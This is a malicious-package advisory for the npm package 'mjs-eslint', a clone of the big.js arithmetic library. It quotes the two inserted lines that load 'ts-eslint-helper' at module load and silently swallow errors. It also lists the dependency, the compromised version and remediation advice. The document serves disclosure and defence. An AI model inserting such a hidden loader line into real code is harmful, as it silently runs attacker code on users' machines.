VYPR

npm · Malicious package advisory

Malware

mjs-eslint

MAL-2026-6223

Malicious code in mjs-eslint (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (51c6776509c718cebce5fe0ef0f5be73ede28f3be69888bfadff198f25ac2df6)
The package is published as 'mjs-eslint' but its description, file layout (big.js, big.mjs), and source are a verbatim copy of the legitimate big.js arbitrary-precision arithmetic library by Michael Mclaughlin. Two lines have been inserted into the IIFE at big.js:605-606 (and identically in big.mjs:605-606): `const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });`. The corresponding dependency `"ts-eslint-helper": "^4.0.1"` is declared in package.json. This call fires at module load on any `require('mjs-eslint')` or `import` of the package, executes asynchronously, and silently swallows all errors via `.catch(()=>{})`. An arithmetic library has no legitimate reason to load a 'ts-eslint' helper at module init, and the name mismatch between the host package (mjs-eslint), the cloned library (big.js), and the dependency (ts-eslint-helper) is the canonical pattern of hiding the payload one hop away in a transitive dependency to evade scanners. Installer harm: any consumer who requires this package pulls in and executes whatever ts-eslint-helper's from_str() contains, with no visible signal.

Compromised versions (1)

  • 7.0.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.